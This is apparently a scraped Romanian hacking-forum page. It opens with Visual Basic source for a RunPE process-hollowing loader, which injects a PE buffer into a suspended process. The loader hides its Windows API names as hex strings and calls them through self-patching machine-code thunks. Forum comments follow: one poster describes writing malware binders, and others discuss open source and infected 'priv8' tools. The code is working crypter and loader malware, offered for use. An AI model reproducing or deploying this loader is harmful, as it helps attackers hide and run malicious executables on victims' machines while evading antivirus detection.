SizeOfUnitializedData As Long AddressOfEntryPoint As Long BaseOfCode As Long BaseOfData As Long ImageBase As Long SectionAlignment As Long FileAlignment As Long MajorOperatingSystemVersion As Integer MinorOperatingSystemVersion As Integer MajorImageVersion As Integer MinorImageVersion As Integer MajorSubsystemVersion As Integer MinorSubsystemVersion As Integer W32VersionValue As Long SizeOfImage As Long SizeOfHeaders As Long CheckSum As Long SubSystem As Integer DllCharacteristics As Integer SizeOfStackReserve As Long SizeOfStackCommit As Long SizeOfHeapReserve As Long SizeOfHeapCommit As Long LoaderFlags As Long NumberOfRvaAndSizes As Long DataDirectory(0 To 15) As IMAGE_DATA_DIRECTORY End Type Private Type IMAGE_NT_HEADERS Signature As Long FileHeader As IMAGE_FILE_HEADER OptionalHeader As IMAGE_OPTIONAL_HEADER End Type Private Type IMAGE_EXPORT_DIRECTORY Characteristics As Long TimeDateStamp As Long MajorVersion As Integer MinorVersion As Integer lpName As Long Base As Long NumberOfFunctions As Long NumberOfNames As Long lpAddressOfFunctions As Long lpAddressOfNames As Long lpAddressOfNameOrdinals As Long End Type Private Type IMAGE_SECTION_HEADER SecName As String * 8 VirtualSize As Long VirtualAddress As Long SizeOfRawData As Long PointerToRawData As Long PointerToRelocations As Long PointerToLinenumbers As Long NumberOfRelocations As Integer NumberOfLinenumbers As Integer Characteristics As Long End Type Public Function zDoNotCall() As Long ' This function will be replaced with machine code laterz ' Do not add any public procedure on top of it End Function Public Sub CallMe(szProcessName As String, lpBuffer() As Byte, sParameter As String) Dim Pidh As IMAGE_DOS_HEADER Dim Pinh As IMAGE_NT_HEADERS Dim Pish As IMAGE_SECTION_HEADER Dim Si As STARTUPINFO Dim Pi As PROCESS_INFORMATION Dim Ctx As CONTEXT Dim i As Long Si.cb = Len(Si) Ctx.ContextFlags = CONTEXT_FULL Call Invoke(GetPointer("3"), VarPtr(Pidh), VarPtr(lpBuffer(0)), Len(Pidh)) Call Invoke(GetPointer("3"), VarPtr(Pinh), VarPtr(lpBuffer(Pidh.e_lfanew)), Len(Pinh)) Call Invoke(GetPointer("1"), 0, StrPtr(szProcessName) & " " & sParameter, 0, 0, 0, CREATE_SUSPENDED, 0, 0, VarPtr(Si), VarPtr(Pi)) Call Invoke(GetPointer("2"), Pi.hProcess, Pinh.OptionalHeader.ImageBase) Call Invoke(GetPointer("4"), Pi.hProcess, Pinh.OptionalHeader.ImageBase, Pinh.OptionalHeader.SizeOfImage, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE) Call Invoke(GetPointer("5"), Pi.hProcess, Pinh.OptionalHeader.ImageBase, VarPtr(lpBuffer(0)), Pinh.OptionalHeader.SizeOfHeaders, 0) For i = 0 To Pinh.FileHeader.NumberOfSections - 1 Call MoveMe(Len(Pish), Pish, lpBuffer(Pidh.e_lfanew + Len(Pinh) + Len(Pish) * i)) Call Invoke(GetPointer("5"), Pi.hProcess, Pinh.OptionalHeader.ImageBase + Pish.VirtualAddress, VarPtr(lpBuffer(Pish.PointerToRawData)), Pish.SizeOfRawData, 0) Next Call Invoke(GetPointer("6"), Pi.hThread, VarPtr(Ctx)) Call Invoke(GetPointer("5"), Pi.hProcess, Ctx.Ebx + 8, VarPtr(Pinh.OptionalHeader.ImageBase), 4, 0) Ctx.Eax = Pinh.OptionalHeader.ImageBase + Pinh.OptionalHeader.AddressOfEntryPoint Call Invoke(GetPointer("7"), Pi.hThread, VarPtr(Ctx)) Call Invoke(GetPointer("8"), Pi.hThread) End Sub Private Function Invoke(ByVal lMod As Long, ParamArray Params()) As Long Dim lPtr As Long Dim i As Long Dim sData As String Dim sParams As String If lMod = 0 Then Exit Function For i = UBound(Params) To 0 Step -1 sParams = sParams & Hex2Str("3638") & GetLong(CLng(Params(i))) Next lPtr = VarPtr(c_bvASM(0)) lPtr = lPtr + (UBound(Params) + 2) * 5 lPtr = lMod - lPtr - 5 sData = Hex2Str(THUNK_APICALL) sData = Replace$(sData, Hex2Str(PATCH1), sParams) sData = Replace$(sData, Hex2Str(PATCH2), GetLong(lPtr)) Call PutThunk(sData) Invoke = PatchCall End Function Private Function GetLong(ByVal lData As Long) As String Dim bvTemp(3) As Byte Dim i As Long Call MoveMe(&H4, bvTemp(0), lData) For i = 0 To 3 GetLong = GetLong & Right$(Hex2Str("30") & Hex$(bvTemp(i)), 2) Next End Function Private Sub PutThunk(ByVal sThunk As String) Dim i As Long For i = 0 To Len(sThunk) - 1 Step 2 c_bvASM((i / 2)) = CByte(Hex2Str("2668") & Mid$(sThunk, i + 1, 2)) Next End Sub Private Function PatchCall() As Long Call MoveMe(&H4, c_lVTE, ByVal ObjPtr(Me)) c_lVTE = c_lVTE + &H1C Call MoveMe(&H4, c_lOldVTE, ByVal c_lVTE) Call MoveMe(&H4, ByVal c_lVTE, VarPtr(c_bvASM(0))) PatchCall = zDoNotCall Call MoveMe(&H4, ByVal c_lVTE, c_lOldVTE) End Function Public Property Get Initialized() As Boolean Initialized = c_bInit End Property Private Sub Class_Initialize() c_bInit = True End Sub Public Function Hex2Str(ByVal strData As String) Dim i As Long, CryptString As String, tmpChar As String On Local Error Resume Next For i = 1 To Len(strData) Step 2 CryptString = CryptString & Chr$(Val(Chr$(38) & Chr$(72) & Mid$(strData, i, 2))) Next i Hex2Str = CryptString End Function Public Function GetPointer(PTR As String) As Long GetPointer = 0 If PTR = "1" Then GetPointer = NtGetProcAddr(NtLoadLibrary(Hex2Str(sKlib)), Hex2Str(sCApi)) Else End If If PTR = "2" Then GetPointer = NtGetProcAddr(NtLoadLibrary(Hex2Str(sNlib)), Hex2Str(sNApi)) Else End If If PTR = "3" Then GetPointer = NtGetProcAddr(NtLoadLibrary(Hex2Str(sKlib)), Hex2Str(sRtApi)) Else End If If PTR = "4" Then GetPointer = NtGetProcAddr(NtLoadLibrary(Hex2Str(sKlib)), Hex2Str(sVApi)) Else End If If PTR = "5" Then GetPointer = NtGetProcAddr(NtLoadLibrary(Hex2Str(sKlib)), Hex2Str(sWApi)) Else End If If PTR = "6" Then GetPointer = NtGetProcAddr(NtLoadLibrary(Hex2Str(sKlib)), Hex2Str(sGApi)) Else End If If PTR = "7" Then GetPointer = NtGetProcAddr(NtLoadLibrary(Hex2Str(sKlib)), Hex2Str(sSApi)) Else End If If PTR = "8" Then GetPointer = NtGetProcAddr(NtLoadLibrary(Hex2Str(sKlib)), Hex2Str(sRApi)) Else End If End Function Public Function NtGetProcAddr(ByVal lModuleHandle As Long, ByVal sProc As String) As Long Dim i As Long Dim ANSI() As Byte ReDim ANSI(0 To Len(sProc)) For i = 1 To Len(sProc) ANSI(i - 1) = Asc(Mid$(sProc, i, 1)) Next i Call LdrGetProcedureAddress(lModuleHandle, VarPtr(ANSI(0)), ByVal 0&, NtGetProcAddr) End Function Public Function NtLoadLibrary(ByVal sName As String) As Long Dim US As UNICODE_STRING Call RtlInitUnicodeString(US, StrPtr(sName)) Call LdrLoadDll(ByVal 0&, ByVal 0&, US, NtLoadLibrary) End Function

Stiu ca exista de mult, dar industria lor nu este atat de infloritoare ca pe Windows. Si motivele sunt simple: Windows ofera mai multe limbaje de programare + .NET care usureaza mult "munca", exista foarte multe exemple si foarte multa documentatie si cel mai important, sunt mult mai multi utilizatori de Windows. Am vrut si eu sa trec la scrierea de malware pentru Linux, am facut acel Darky Binder (v2.0) pentru Linux dar nu m-a pasionat foarte mult asta.

Cu ce va incanta pe voi ca este open-source? Cate patch-uri ati scris voi? De cate ori v-ati uitat in sursa? Ideea e sa nu mai aduceti acest pseudo-argument. In plus, la un proiect open-source poate aduce un patch nea Vasile din varful satului, la Microsoft lucreaza insa oameni bine platiti care stiu ce fac.

Nu statea nimeni sa infecteze atatea fisiere. Oricum sunt sigur ca sunt si fisiere infectate, dar nu de el. Dar de obicei, cei care fac astfel de programele nu le infecteaza, insa e posibil ca cele "priv8" sa fie infectate. Felicitari pentru munca depusa.